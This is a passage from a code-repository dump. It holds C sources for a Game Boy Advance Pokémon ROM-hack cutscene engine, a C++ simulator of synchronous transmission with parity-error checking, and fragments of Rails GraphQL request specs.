u8 rot_scale_flag : 1;
u8 doublesize_disable_flag : 1; // if rotscale 0, disable obj. Else double size
u8 obj_mode : 2; // 0 normal, 1 semi transparent, 2 obj window, 3 prohibited
u8 obj_mosaic : 1;
u8 color_mode : 1; // 16 or 256
u8 obj_shape : 2; // 0=Square,1=Horizontal,2=Vertical
};
struct attr1 {
u16 x : 9;
u16 rot_scale : 3;
u16 h_flip : 1;
u16 v_flip : 1;
u16 obj_size : 2;
};
struct attr2{
u16 tile_num : 10;
u16 priority : 2;
u16 pal_num : 4;
};
struct sprite {
//struct attr0 attr0;
//struct attr1 attr1;
//struct attr2 attr2;
u8 y;
u8 flags1;
u8 x;
u8 msbx_flags;
u16 locs;
u16 rotscale;
};
struct resource {
u8 *graphics;
u16 size;
u16 tag;
};
struct objtemplate {
u16 tiles_tag;
u16 pal_tag;
struct sprite *oam;
struct frame **animation;
struct resource *graphics;
struct rotscale_frame *rotscale;
object_callback callback;
};
struct object {
struct sprite final_oam;
struct frame **animation_table;
u8 *gfx_table;
struct rotscale_frame **rotscale_table;
struct objtemplate *template;
u32 field18;
object_callback callback;
u16 x;
u16 y;
u16 x2;
u16 y2;
u8 x_centre;
//u8 y_centre;
u8 anim_number;
u8 anim_frame;
u8 anim_delay;
u8 counter;
u16 private[8];
u8 bitfield2;
u8 bitfield;
u16 anim_data_offset;
u8 field42;
u8 field43;
};
struct tagged_pal {
u8 *pal_ptr;
u16 pal_tag;
u16 padding;
};
extern struct object objects[64];
u8 *obj_ids_to_display;
struct sprite * poke_oam_battle;
struct frame ** anim_poke;
struct rotscale_frame **rotscale_empty;
object_callback oac_nullsub;
u8 template_instanciate_forward_search(struct objtemplate *, u8, u8, u8);
u8 template_instanciate_reverse_search(struct objtemplate *, u8, u8, u8);
void obj_delete(struct object *);
void obj_delete_and_free_tiles(struct object *);
void gpu_tile_obj_alloc_tag_and_upload(struct resource *);
void gpu_pal_obj_alloc_tag_and_apply(struct tagged_pal *);
static inline u8 obj_id_from_obj(struct object *obj) {
u32 pointer = (u8 *)obj - (u8 *)objects;
return ((u32)pointer / 0x44);
}
#endif /* ENGINE_OBJECTS_H */
<file_sep>/src/graphics/BGs/BG.c
#include "../../types.h"
#include "BG.h"
u8 *gpu_pal_tag_search_lower_boundary = (u8 *)0x03003E58;
void gpu_pal_apply(u8 *, u16, u8);
void lz77UnCompVram(void *src, void *dst);
void lcd_io_set(u32, u32);
void setup_ioregs_bg() {
u8 i;
for (i = 0; i < 4; i ++) {
BG_CNT[i].priority = i;
BG_CNT[i].char_index = i;
BG_CNT[i].padding = 0;
BG_CNT[i].mosiac = 0;
BG_CNT[i].color = 0;
BG_CNT[i].map_index = (0x1F - i);
BG_CNT[i].screen_over = 0;
BG_CNT[i].size = 0;
}
lcd_io_set(0x50, 0x2F00);
lcd_io_set(0x52, 0x0F);
}
// copy BG into area
void set_bg(u8 bg_id, u8 *gfx, u8 *tile_map, u8 *pal, u8 pal_slot, u8 pal_size) {
void *char_base = (void *)0x6000000 + (0x4000 * bg_id);
void *map_base = (void *)0x6000000 + (0xF800 - (0x800 * bg_id));
lz77UnCompVram(gfx, char_base);
lz77UnCompVram(tile_map, map_base);
gpu_pal_apply(pal, pal_slot * 16, pal_size);
gpu_sync_bg_show(bg_id);
}
void load_trainer_bg(u8 gender) {
if (gender) {
// girl
//set_bg(2, (u8 *)&hero2_tiles, (u8 *)hero2_map, (u8 *)hero2_pal, 0, 0x20);
} else {
// boy
//set_bg(2, (u8 *)&hero1_tiles, (u8 *)hero1_map, (u8 *)hero1_pal, 0, 0x20);
}
}<file_sep>/src/engine/structs_data.h
#ifndef WRAM_STRUCTS_DATA_H
#define WRAM_STRUCTS_DATA_H
/*Walkrun state*/
struct walkrun {
u8 bitfield;
u8 bike;
u8 running2;
u8 running1;
u8 oamid;
u8 npcid;
u8 lock;
u8 gender;
u8 xmode;
u8 field9;
u8 fielda;
u8 fieldb;
u16 fieldc;
u16 field14;
u8 field18;
u8 field19;
u16 field1A;
u16 most_recent_override_tile;
};
extern struct walkrun walkrun_state;
/* sav2 structure */
struct saveblock_trainerdata {
struct sav2 *sav2;
};
struct sav2 {
char name[8];
u8 gender;
u8 padding;
u16 trainer_id;
u16 secret_id;
u16 hours;
u8 minutes;
u8 seconds;
u8 frames;
u8 options_button_style;
u8 options_text_speed;
u8 options_battle_style[7];
u32 field_1C;
u8 field_20[8];
u8 pokemon_flags_3[52];
u8 pokemon_flags_4[52];
u8 field_90[1044];
u8 fourCharacters[4];
u8 field_4A8[1008];
u8 mapdata[1672];
u32 bag_item_quantity_xor_value;
u8 field_F24[127];
u8 last_byte_in_sav2;
};
extern struct saveblock_trainerdata saveblock2;
/* vars */
struct temp_vars {
// Only 0x8000s here
u16 var_8000;
u16 var_8001;
u16 var_8002;
u16 var_8003;
u16 var_8004;
u16 var_8005;
u16 var_8006;
u16 var_8007;
u16 var_8008;
u16 var_8009;
u16 var_800A;
u16 var_800B;
u16 var_800D;
u16 var_800F;
u16 var_800C;
u16 var_8010;
u16 var_8011;
};
extern struct temp_vars temp_vars;
struct pokemon {
u32 PID;
u32 OTID;
char name[10];
u16 language;
u8 OT_name[7];
u8 markings;
u16 checksum;
u16 padding_maybe;
u8 data[48];
u32 ailment;
u8 level;
u8 pokerus;
u16 current_hp;
u16 total_hp;
u16 attack;
u16 defense;
u16 speed;
u16 sp_attack;
u16 sp_defense;
};
extern struct pokemon player_party[6];
extern struct pokemon opponent_party[6];
#endif /* WRAM_STRUCTS_DATA_H */
<file_sep>/src/engine/text/textboxes.h
#ifndef TEXTBOXES_H
#define TEXTBOXES_H
#include "../types.h"
#include "../engine/tasks.h"
#include "../structs_data.h"
/* Rboxes */
struct rbox {
u8 bg_id;
u8 x;
u8 y;
u8 w;
u8 h;
u8 pal_id;
u16 vram_tile_offset;
u32 pixels;
};
extern struct rbox rboxes[32];
// dual choice rbox
struct rbox msg_dual_choice = {0x0, 0x14, 0x7, 0x5, 0x4, 0xF, 0x174, 0x6020200};
u8 rbox_get_id_something(struct rbox*);
void rboxid_clear_pixels(u8, u8);
void rboxid_tilemap_update(u8);
void rboxid_upload_a(u8, u8);
void rboxid_80040B8(u8);
void rboxid_8003E3C(u8);
u8 fboxid_get_field(u8, u8);
void box_print(u8, u8, u8, u8, u8, u8, char*);
void sub_810F7D8(u8, u8, u8, u8, u8, u8, u8);
void box_curved(u8, u8);
void box_related_one(u8, u8, char *, u8, u8, u8, u8, u8);
u8 remoid_a_pressed_maybe(u8);
void sub_0812FFF0(u8);
void rboxes_free(void);
void msg_normal(char *);
void wait_select(u8);
void multichoice_box(char **, u8, struct rbox *,u8);
u8 sub_807F3A4(u8, char *, u8, u8);
u16 sub_810FA04(void);
u8 sub_807E418(void);
#endif /* TEXTBOXES_H */<file_sep>/src/graphics/OBJs/oam.c
#include "../../types.h"
#include "../../../gfx/gfx_resources.h"
#include "../../structs_data.h"
#include "../../tables.h"
void LZ77UnCompAnyRAM(u8 *src, u8 *dst, u8 id);
void lz77UnCompVram(void* src, void* dst);
u8 gpu_pal_alloc_new(u16);
void pal_decompress_slice_to_faded_and_unfaded(void* src, u16 start, u16 end);
void gpu_pal_upload(void);
void *malloc_and_clear(u32);
void fighter_gfx_init(u8 controller, u16 species) {
// void *memcpy(void *str1, const void *str2, u32 n);
u16 oam_attr1 = (0x8004 + (0xCC * controller));
if (!controller) {
oam_attr1 |= 0x1000;
}
u16 oam_fighter[] = {0x1076, oam_attr1, (16 *(FRAME_COUNT) * controller)};
u16 *oam = (u16 *)(0x7000000 + (8 * controller));
u8 i;
for (i = 0; i < 3; i ++) {
*oam = oam_fighter[i];
oam++;
}
void gpu_pal_apply(u8 *pal, u16 pal_slot, u8 pal_size);
gpu_pal_apply(fighter_gfx[(species << 1) + 1], 16 * 16 ,32);
lz77UnCompVram((void *)fighter_gfx[species << 1], (void *)oam_ram_partition[controller]);
}<file_sep>/src/engine/tasks.h
#ifndef TASKS_H
#define TASKS_H
#include "../types.h"
/* Tasks system */
typedef void (*task_callback)(u8);
struct task {
task_callback function;
bool inuse;
u8 prev;
u8 next;
u8 priority;
u16 priv[16];
};
u8 task_add(task_callback func, u8 priority);
void task_del(u8 id);
void task_exec(void);
extern struct task tasks[16];
#endif /* TASKS_H */<file_sep>/src/buttons.h
#ifndef BUTTONS_H
#define BUTTONS_H
#include "../../types.h"
/* Button definitions */
#define KEYA 1
#define KEYB 2
#define KEYSELECT 4
#define KEYSTART 8
#define KEYRIGHT 16
#define KEYLEFT 32
#define KEYUP 64
#define KEYDOWN 128
#define KEYR 256
#define KEYL 512
struct sprite {
//struct attr0 attr0;
//struct attr1 attr1;
//struct attr2 attr2;
u8 y;
u8 flags1;
u8 x;
u8 msbx_flags;
u16 locs;
u16 rotscale;
};
/* Super state */
typedef void (*super_callback)(void);
struct super {
super_callback callback1;
super_callback callback2;
super_callback callback2backup;
super_callback callback_vblank;
super_callback callback_hblank;
u32 field_14;
u32 field_18;
u32 bit_to_wait_for;
u32 *ptr_vblank_counter;
u32 field_24;
u16 buttons_held;
u16 buttons_new;
u16 buttons_held_remapped;
u16 buttons_new_remapped;
u16 buttons_new_and_key_repeat;
u32 keypad_countdown;
u32 unused_padding;
struct sprite sprites[128];
u8 multipurpose_state_tracker;
u8 gpu_sprites_upload_skip;
};
extern struct super superstate;
#endif /* BUTTONS_H */<file_sep>/README.md
# mega-evolution-cutscene
Cutscene during mega evolution
<file_sep>/src/main.c
#include "types.h"
#include "character_control\buttons\buttons.h"
#include "character_control\controls\player_movement.c"
#include ".\graphics\BGs\BG.c"
//#include ".\graphics\OBJs\oam.c"
#include ".\text\textboxes.h"
#include "..\gfx\gfx_resources.h"
#include "engine\tasks.h"
#include "character_control.c"
/* Funcs */
void overworld_free_bgmaps(void);
void pal_fade_control_and_dead_struct_reset(void);
void gpu_tile_bg_drop_all_sets(u8);
void palette_bg_faded_fill_black(void);
void vblank_handler_set(u8);
void hblank_handler_set(u8);
void CpuSet(void *src, void *dst, uint mode);
void obj_and_aux_reset_all(void);
void tasks_init(void);
void gpu_pal_allocator_reset(void);
void set_callback2(super_callback);
void gpu_sync_bg_hide(u8);
void gpu_sprites_upload(void);
void copy_queue_process(void);
void gpu_pal_upload(void);
void fade_screen(u32, u8, u8, u8, u32);
void help_system_disable__sp198(void);
void current_map_music_set(u16);
void remoboxes_acknowledge(void);
void task_exec(void);
void objc_exec(void);
void obj_sync_something(void);
void audio_play(u8);
void vblank_cb() {
// deals with copying data from FR's high level structs in
// WRAM into approriate RAM addresses.
//gpu_sprites_upload();
//copy_queue_process();
gpu_pal_upload();
}
// reset screen attributes
void setup() {
// callbacks
vblank_handler_set(0);
hblank_handler_set(0);
set_callback2((super_callback)0x812EB11);
// BGs
overworld_free_bgmaps();
gpu_tile_bg_drop_all_sets(0);
int src_zero = 0;
CpuSet(&src_zero, (void *)0x6000000, (uint)0x5006000);
// pals
pal_fade_control_and_dead_struct_reset();
palette_bg_faded_fill_black();
pal_fade_control_and_dead_struct_reset();
gpu_pal_allocator_reset();
*gpu_pal_tag_search_lower_boundary = 0;
// objs
obj_and_aux_reset_all();
// tasks
tasks_init();
// more BG setup
superstate.callback_vblank = vblank_cb;
setup_ioregs_bg();
bgid_mod_x_offset(0, 0, 0);
bgid_mod_y_offset(0, 0, 0);
bgid_mod_x_offset(1, 0, 0);
bgid_mod_y_offset(1, 0, 0);
bgid_mod_x_offset(2, 0, 0);
bgid_mod_y_offset(2, 0, 0);
bgid_mod_x_offset(3, 0, 0);
bgid_mod_y_offset(3, 0, 0);
remoboxes_acknowledge();
rboxes_free();
}
u16 bgid_get_y_offset(u8);
u16 bgid_get_x_offset(u8);
void sky_scroll(u8 task_id) {
bgid_mod_x_offset(0, bgid_get_x_offset(0) + 64, 0);
}
extern void test();
void battle_ground_make() {
task_exec();
objc_exec();
obj_sync_something();
//tilemaps_sync();
switch (superstate.multipurpose_state_tracker) {
case 0:
{
temp_vars.var_8001 = 0;
/*// REG_DISPCNT setup
REG_DISPCNT.mode = 2;
REG_DISPCNT.GBC_mode = 0;
REG_DISPCNT.frame_select = 0;
REG_DISPCNT.hblank_oam_process = 0;
REG_DISPCNT.sprite_tile_mapping = 0; //2d or 3d mapping
REG_DISPCNT.screen_blank = 0;
REG_DISPCNT.BG0_enable = 1;
REG_DISPCNT.BG1_enable = 1;
REG_DISPCNT.BG2_enable = 1;
REG_DISPCNT.BG3_enable = 0;
REG_DISPCNT.sprite_enable = 1;
REG_DISPCNT.win0_enable = 0;
REG_DISPCNT.win1_enable = 0;
REG_DISPCNT.oam_win_enable = 0;
temp_vars.var_8000 = *DISPCNT;
// REG_BGCNT
u8 i;
for (i = 0; i < 4; i ++) {
BG_CNT[i].priority = i;
BG_CNT[i].char_index = i;
BG_CNT[i].padding = 0;
BG_CNT[i].mosiac = 0;
BG_CNT[i].color = 0;
BG_CNT[i].map_index = (0x1F - i);
BG_CNT[i].screen_over = 0;
BG_CNT[i].size = 0;
}
BG_CNT[1].color = 1;
lcd_io_set(0x50, 0x2F00);
lcd_io_set(0x52, 0x0F);*/
test();
superstate.multipurpose_state_tracker++;
break;
}
case 1:
{
// load VRAM BG background
u8 bg_config_data[16] = {0xF0, 0x11, 0x0, 0x0, 0xE5, 0x09, 0x0, 0x0, 0xDA, 0x21, 0x0, 0x0, 0xCF, 0x31, 0x0, 0x0};
void bg_vram_setup(u8, u8 *, u8);
// mode, setup, amount of bgs to config
bg_vram_setup(0, (u8 *)&bg_config_data, 4);
set_bg(0, (u8 *)sky_tiles, (u8 *)sky_map, (u8 *)sky_pal, 6, 32);
set_bg(1, (u8 *)tree_tiles, (u8 *)tree_map, (u8 *)tree_pal, 0, 160);
superstate.multipurpose_state_tracker++;
break;
}
case 2:
{
// wtb better clouds
task_add(sky_scroll, 0x1);
superstate.multipurpose_state_tracker++;
break;
}
case 3:
{
void gpu_bg_config_set_field(u8, u8, u8);
gpu_bg_config_set_field(0, 5, 1);
superstate.multipurpose_state_tracker++;
break;
}
case 4:
{
make_player(0);
make_opponent(0);
superstate.multipurpose_state_tracker++;
break;
}
case 5:
{
player_char_movement();
break;
}
case 99:
{
// waitstate + next command buffer
player_movement_buffer();
break;
}
default:
break;
};
}
void zinit_scene() {
superstate.multipurpose_state_tracker = 0;
help_system_disable__sp198();
setup();
superstate.callback1 = (super_callback)(battle_ground_make + 1);
superstate.callback2 = 0;
};
<file_sep>/src/graphics/BGs/BG.h
#ifndef BG_H
#define BG_H
// 0x04000000
struct REG_DISPCNT {
u16 mode : 3;
u16 GBC_mode : 1;
u16 frame_select : 1;
u16 hblank_oam_process : 1;
u16 sprite_tile_mapping : 1;
u16 screen_blank : 1;
u16 BG0_enable : 1;
u16 BG1_enable : 1;
u16 BG2_enable : 1;
u16 BG3_enable : 1;
u16 sprite_enable : 1;
u16 win0_enable : 1;
u16 win1_enable : 1;
u16 oam_win_enable : 1;
};
extern struct REG_DISPCNT REG_DISPCNT;
u16 *DISPCNT = (u16 *)0x04000000;
// 0x04000004
struct REG_DISPSTAT {
u8 vertical_refresh : 1;
u8 horizontal_refresh : 1;
u8 vcount_trigger : 1;
u8 vblank_irq : 1;
u8 hblank_irq : 1;
u8 unused : 2;
u8 vcount_line_trigger;
};
extern struct REG_DISPSTAT REG_DISPSTAT;
// 0x04000006
extern u16 *REG_vcount;
// 0x04000008 - 0x0400000E
struct REG_BGCNT {
u16 priority : 2;
u16 char_index : 2; // 0x6000000 + char_index * 0x4000
u16 padding : 2;
u16 mosiac : 1;
u16 color : 1; // 256 or 16
u16 map_index : 5;
u16 screen_over : 1;
u16 size : 2;
/*
For "text" backgrounds:
00 : 256x256 (32x32 tiles)
01 : 512x256 (64x32 tiles)
10 : 256x512 (32x64 tiles)
11 : 512x512 (64x64 tiles)
For rotational backgrounds:
00 : 128x128 (16x16 tiles)
01 : 256x256 (32x32 tiles)
10 : 512x512 (64x64 tiles)
11 : 1024x1024 (128x128 tiles)
*/
};
struct REG_BGCNT BG_CNT[4];
u16 *REG_BG0CNT = (u16 *) 0x04000008;
u16 *REG_BG1CNT = (u16 *) 0x0400000A;
u16 *REG_BG2CNT = (u16 *) 0x0400000C;
u16 *REG_BG3CNT = (u16 *) 0x0400000E;
// 0x04000010 - 0x0400001E
/* BGHOFS & BGVOFS */
struct REG_BG_POS {
u32 x_pos : 10;
u32 x_pad : 6;
u32 y_pos : 10;
u32 y_pad : 6;
};
struct REG_BG_POS BG_POS[4];
/* This contains the 2x2 matrix controlling rotation and scaling of rotscale
BGs in video mode 1 and mode 2. Namely BG2 and BG3. Along with other things */
/* |PA PB|
|PC PD| */
// 0x04000020 - 0x04000036
struct REG_BG_ROTSCALE {
s16 BG2_PA; // 0x04000020 - 0x04000026
s16 BG2_PB;
s16 BG2_PC;
s16 BG2_PD;
s32 REG_BG_X; // 0x04000028 - 0x0400002F
s32 REG_BG_Y;
s16 BG3_PA; // 0x04000030 - 0x04000036
s16 BG3_PB;
s16 BG3_PC;
s16 BG3_PD;
s32 BG3_X; // 0x04000038 - 0x0400003C
s32 BG3_Y;
};
extern struct REG_BG_ROTSCALE BG_ROTSCALE;
// 0x04000040 - 0x0400004A
struct WIN_REG_SIZE {
// horizontal length = delta x
u8 win0_x2;
u8 win0_x1;
u8 win1_x2;
u8 win1_x1;
// vertical length = delta y
u8 win0_y2;
u8 win0_y1;
u8 win1_y2;
u8 win1_y1;
};
struct REG_WIN_IN {
u16 BG0_win0 : 1;
u16 BG1_win0 : 1;
u16 BG2_win0 : 1;
u16 BG3_win0 : 1;
u16 oams_win0 : 1;
u16 blend_win0 : 1;
u16 padding_win0 : 2;
u16 BG0_win1 : 1;
u16 BG1_win1 : 1;
u16 BG2_win1 : 1;
u16 BG3_win1 : 1;
u16 oams_win1 : 1;
u16 blend_win1 : 1;
u16 padding_win1 : 2;
};
struct REG_WIN_OUT {
u16 BG0_win0 : 1;
u16 BG1_win0 : 1;
u16 BG2_win0 : 1;
u16 BG3_win0 : 1;
u16 oams_win0 : 1;
u16 blend_win0 : 1;
u16 padding_win0 : 2;
u16 BG0_win1 : 1;
u16 BG1_win1 : 1;
u16 BG2_win1 : 1;
u16 BG3_win1 : 1;
u16 oams_win1 : 1;
u16 blend_win1 : 1;
u16 padding_win1 : 2;
};
extern struct WIN_REG_SIZE WIN_REG;
// 0x0400004C
struct REG_MOSAIC {
u16 BG_x_len : 4;
u16 BG_y_len : 4;
u16 OAM_x_len : 4;
u16 OAM_y_len : 4;
};
extern struct REG_MOSAIC REG_MOSAIC;
// 0x04000050
struct REG_BLDMOD {
u16 blend_BG0_s : 1;
u16 blend_BG1_s : 1;
u16 blend_BG2_s : 1;
u16 blend_BG3_s : 1;
u16 blend_OAM_s : 1;
u16 blend_backdrop_s : 1; // ???
u16 blend_mode : 2;
u16 blend_BG0_t : 1;
u16 blend_BG1_t : 1;
u16 blend_BG2_t : 1;
u16 blend_BG3_t : 1;
u16 blend_OAM_t : 1;
u16 blend_backdrop_t : 1; // ???
};
extern struct REG_BLDMOD BLD_MOD;
// 0x04000052
struct REG_COLEV {
u16 coeff_a_source : 5;
u16 coeff_a_padding : 3;
u16 coeff_b_source : 5;
u16 coeff_b_padding :3;
};
// 0x04000054
struct REG_COLEY {
u16 light_dark_multiplier : 5;
u16 padding : 11;
};
void gpu_sync_bg_show(u8);
void gpu_sync_bg_hide(u8);
void bgid_mod_x_offset(u8 bgid, u16 delta, u8 dir);
void bgid_mod_y_offset(u8 bgid, u16 delta, u8 dir);
#endif /* BG_H */
|
6f91eb611edf9072162ea2acc1607bc9e3976ed7
|
[
"Markdown",
"C"
] | 11 |
C
|
EternalCode/mega-evolution-cutscene
|
b0525094f6cee532436e5f6b98feba41896e288e
|
4deefd4fe658247e1929cf9622cdd5426332dec9
|
refs/heads/master
|
<file_sep>#pragma once
#include <iostream>
#include <iomanip>
#include <string>
#include <fstream>
#include <algorithm>
class sync_phys {
public:
/*
Transmits data from inFile to outFile with frames of
64 character data blocks preceded by two SYN characters
All characters transmitted are subject to transmission
errors, at a hard coded 10% chance.
*/
static int transWithErr(std::ifstream& inFile, std::ofstream& outFile);
/*
Transmits data from inFile to outFile with frames of
64 character data blocks preceded by two SYN characters
*/
static int transWithOutErr(std::ifstream& inFile, std::ofstream& outFile);
/*
Receives data from inFile, deconstructs each block,
and outputs ASCII characters to outFile. Catches any
parity errors that might have occurred during transmission
by checking the unordered map ASCII_REC; upon not finding
a corresponding entry, it reports an error.
*/
static int receive(std::ifstream& inFile, std::ofstream& outFile);
};<file_sep>#include "stdafx.h"
#include "sync_phys.h"
#include "sync_data.h"
using namespace std;
const std::unordered_map<int, std::string> sync_data::ascii_map::ascii_trans = sync_data::ascii_map::createTransMap();
const std::unordered_map<std::string, int> sync_data::ascii_map::ascii_rec = sync_data::ascii_map::createRecMap();
int sync_phys::transWithErr(ifstream& inFile, ofstream& outFile) {
int fileSize, frameCnt, dataBytesLeft;
const int errChance = 10;
char c = 0;
//Get Filesize
fileSize = sync_data::getFileSize(inFile);
//Break filesize into 64 byte data blocks
frameCnt = fileSize / 64;
//Determine size, if any, of data leftover after full frames
dataBytesLeft = (fileSize % 64);
//Read all full frames
for (int i = 0; i < frameCnt; i++) {
// New block, send SYN twice, length 64.
outFile << sync_data::transError(sync_data::ascii_map::ascii_trans.at(22), errChance)
<< sync_data::transError(sync_data::ascii_map::ascii_trans.at(22), errChance)
<< sync_data::transError(sync_data::ascii_map::ascii_trans.at(64), errChance);
for (int j = 0; j < 64; j++) {
// Transmit char in binary (as '0' and '1' chars) with odd parity
inFile.get(c);
outFile << sync_data::transError(sync_data::ascii_map::ascii_trans.at(c), errChance);
}
}
//If there are data bytes left after the last full frame
//Write the SYN characters, the size, and then
//Transmit each char in binary (as '0' and '1' chars) with odd parity
if (dataBytesLeft > 0) {
outFile << sync_data::transError(sync_data::ascii_map::ascii_trans.at(22), errChance)
<< sync_data::transError(sync_data::ascii_map::ascii_trans.at(22), errChance)
<< sync_data::transError(sync_data::ascii_map::ascii_trans.at(dataBytesLeft), errChance);
while (inFile.get(c)) {
outFile << sync_data::transError(sync_data::ascii_map::ascii_trans.at(c), errChance);
}
}
return 0;
}
int sync_phys::transWithOutErr(ifstream& inFile, ofstream& outFile) {
int fileSize, frameCnt, dataBytesLeft;
char c = 0;
//Get Filesize
fileSize = sync_data::getFileSize(inFile);
//Break filesize into 64 byte data blocks
frameCnt = fileSize / 64;
//Determine size, if any, of data leftover after full frames
dataBytesLeft = (fileSize % 64);
//Read all full frames
for (int i = 0; i < frameCnt; i++) {
// New block, send SYN twice, length 64.
outFile << "011010000110100000000010"; //CHR(22)+CHR(22)+CHR(64)
for (int j = 0; j < 64; j++) {
// Transmit char in binary (as '0' and '1' chars) with odd parity
inFile.get(c);
outFile << sync_data::ascii_map::ascii_trans.at(c);
}
}
//If there are data bytes left after the last full frame
//Write the SYN characters, the size, and then
//Transmit each char in binary (as '0' and '1' chars) with odd parity
if (dataBytesLeft > 0) {
outFile << "0110100001101000" << sync_data::ascii_map::ascii_trans.at(dataBytesLeft); //CHR(22)+CHR(22)+DATA SIZE CHAR
for (int i = 0; i < dataBytesLeft; i++) {
inFile.get(c);
outFile << sync_data::ascii_map::ascii_trans.at(c);
}
}
return 0;
}
int sync_phys::receive(ifstream& inFile, ofstream& outFile) {
int fileSize, frameCnt, dataSize;
char dataChar[8];
const string synChars = "0110100001101000";
sync_data::frameHeader fh;
//Get Filesize
fileSize = sync_data::getFileSize(inFile);
//Break filesize into each full frame
//16 chars (SYN SYN) + 8 chars (length char) + 512 (64*8) data chars = 536 chars
frameCnt = fileSize / 536;
//Determine size, if any, of data leftover after full frames
//Get remainder of division, subtract 16 bytes of SYN SYN, 8 bytes of length char
//dataBytesLeft = (fileSize % 536) - 24;
//Determines if there is a frame with less than 64 data characters, if so, add one to frameCnt
if (fileSize % 536 > 0) frameCnt++;
//Read all full frames
//Check SYN as first two chars
for (int i = 0; i < frameCnt; i++) {
inFile.read((char *)&fh, sizeof(fh));
string strSyn(fh.synChars, fh.synChars + 16);
if (synChars != strSyn) {
cout << "SYN character error detected." << endl;
return 1;
}
string strLen(fh.lenChar, fh.lenChar + 8);
if (sync_data::ascii_map::ascii_rec.find(strLen) != sync_data::ascii_map::ascii_rec.end()) {
dataSize = sync_data::ascii_map::ascii_rec.at(strLen);
}
else {
cout << "Length character error detected." << endl;
return 1;
}
for (int j = 0; j < dataSize; j++) {
inFile.read((char *)&dataChar, sizeof(dataChar));
string strData(dataChar, dataChar + 8);
if (sync_data::ascii_map::ascii_rec.find(strData) != sync_data::ascii_map::ascii_rec.end()) {
outFile << (char)sync_data::ascii_map::ascii_rec.at(strData);
}
else {
cout << "Data character error detected." << endl;
return 1;
}
}
}
return 0;
}<file_sep>#include "stdafx.h"
#include "sync_data.h"
int sync_data::getFileSize(std::ifstream& inFile)
{
int fileSize = 0;
inFile.seekg(0, std::ios::end);
fileSize = inFile.tellg();
inFile.seekg(0, std::ios::beg);
return fileSize;
}
std::string sync_data::transError(std::string s, int errChance)
{
// Seed once per run; calling srand(time(NULL)) on every invocation
// repeats the same pseudo-random draws within a given second.
static bool seeded = false;
if (!seeded) {
srand((unsigned int)time(NULL));
seeded = true;
}
if ((rand() % 100 + 1) <= errChance) {
// Flip one bit so a simulated error always corrupts the data
size_t pos = rand() % s.size();
s.at(pos) = (s.at(pos) == '0') ? '1' : '0';
}
return s;
}
* Sync.cpp *
* *
* DESCRIPTION: Simulates synchronous transmission and reception. *
* Options to simulate transmissions errors or not. *
* Input Parameters: Sync <mode> <infile> <outfile> *
* Modes: TE: Transmit(with errors) *
* TN: Transmit(no errors) *
* R: Receive *
* *
* *
* AUTHOR: <NAME> START DATE: 10/4/2017 *
*********************************************************************************************/
#include "stdafx.h"
#include "sync_app.h"
#include "sync_phys.h"
using namespace std;
//Converts a string to all uppercase characters
string upCase(string str) {
transform(str.begin(), str.end(), str.begin(), ::toupper);
return str;
}
//Checks valid mode
bool validMode(string mode) {
if (mode == "TE" || mode == "TN" || mode == "R") {
return true;
}
else {
cout << "Not a valid mode. Valid modes include: TE, TN, R" << endl;
return false;
}
}
void prompt()
{
cout << "Welcome to Aaron's Synchronous Transmitter/Receiver." << endl;
cout << "Accepted input: Sync <mode> <infile> <outfile>" << endl;
cout << "Modes: TE: Transmits(with errors), TN: Transmits(no errors), R: (Receives)" << endl;
}
int main(int argc, char* argv[]) {
string mode;
ifstream inFile;
ofstream outFile;
if (argc != 4) {
cout << "Incorrect number of arguments supplied." << endl;
prompt();
return EXIT_FAILURE;
}
mode = upCase(argv[1]);
if (!validMode(mode)) {
cout << "Invalid mode.";
prompt();
return EXIT_FAILURE;
}
inFile.open(argv[2], ios::in | ios::binary);
if (!inFile) {
cout << "Can't open input file " << argv[2] << endl;
prompt();
return EXIT_FAILURE;
}
outFile.open(argv[3], ios::out | ios::binary);
if (!outFile) {
cout << "Can't open output file " << argv[3] << endl;
prompt();
return EXIT_FAILURE;
}
if (mode == "TN") {
if (sync_phys::transWithOutErr(inFile, outFile) == 1) return EXIT_FAILURE;
}
else if (mode == "TE") {
if (sync_phys::transWithErr(inFile, outFile) == 1) return EXIT_FAILURE;
}
else if (mode == "R") {
if (sync_phys::receive(inFile, outFile) == 1) return EXIT_FAILURE;
}
inFile.close();
outFile.close();
return EXIT_SUCCESS;
}
|
12b968560054d415488922db33e95a33a75e46d3
|
[
"C++"
] | 4 |
C++
|
amillikin/Sync
|
2838ccd4030ad513eb08a4d37809702632ff2f5e
|
3632e0c7eefd3b7ba40e78ba2db8c2d14f808018
|
refs/heads/master
|
<file_sep># code here!
class School
def initialize(name)
@name = name
@roster = {}
end
def roster
@roster
end
def add_student(s_name, s_grade)
#If grade doesn't exist, make new k-v pair
#If it DOES exist, add to student_arr
if @roster.include?(s_grade)
@roster[s_grade] << s_name
else
#add_student("Person", 10) --> {10 => ["Person"]}
@roster[s_grade] = [s_name]
end
# if @roster.include?(s_grade)
# @roster[s_grade] << s_name
# else
# @roster[s_grade] = [] << s_name
# end
end
def grade(grade)
@roster[grade]
end
def sort
@roster.each do |grade, student_arr| #iterate thru roster hash...
student_arr.sort! #for every grade, sort student arr permanently
end
@roster #return altered roster
end
end
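The grouping pattern in `add_student` above (append to an existing grade's array, else create a new key) has a common one-call equivalent. A hedged Python sketch of the same roster logic, purely for comparison (the class and method names here mirror the lab but are illustrative, not part of it):

```python
class School:
    """Python sketch of the Ruby School class above (illustrative only)."""

    def __init__(self, name):
        self.name = name
        self.roster = {}

    def add_student(self, s_name, s_grade):
        # setdefault covers both branches: existing grade and new grade
        self.roster.setdefault(s_grade, []).append(s_name)

    def grade(self, grade):
        return self.roster.get(grade)

    def sort(self):
        for students in self.roster.values():
            students.sort()  # sort each grade's students in place
        return self.roster
```

`dict.setdefault(key, [])` returns the existing list or installs and returns a fresh one, collapsing the if/else in the Ruby version into one line.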
|
2ca3d20765215680214dfd8cfdf3f2fbed21c732
|
[
"Ruby"
] | 1 |
Ruby
|
TimeSmash/school-domain-nyc-web-060319
|
741be5ccbd9b602130322c4b6416573936ba12f2
|
f155bc322d9850bf184a27b30963d2ed95760cf7
|
refs/heads/master
|
<file_sep>require 'rails_helper'
describe 'User Query', type: :request do
include_context 'GraphQL Client'
let(:query) do
<<-GRAPHQL
query {
users {
id,
name
}
}
GRAPHQL
end
it 'returns a list of users' do
users_ids = create_list(:user, 2).map(&:id).map(&:to_s)
response = client.execute(query)
users = response.data.users
expect(users.map(&:id)).to contain_exactly(*users_ids)
end
end
<file_sep>FactoryBot.define do
factory :lesson do
description 'cool description'
user
end
end
<file_sep>require 'rails_helper'
describe 'User Mutation', type: :request do
include_context 'GraphQL Client'
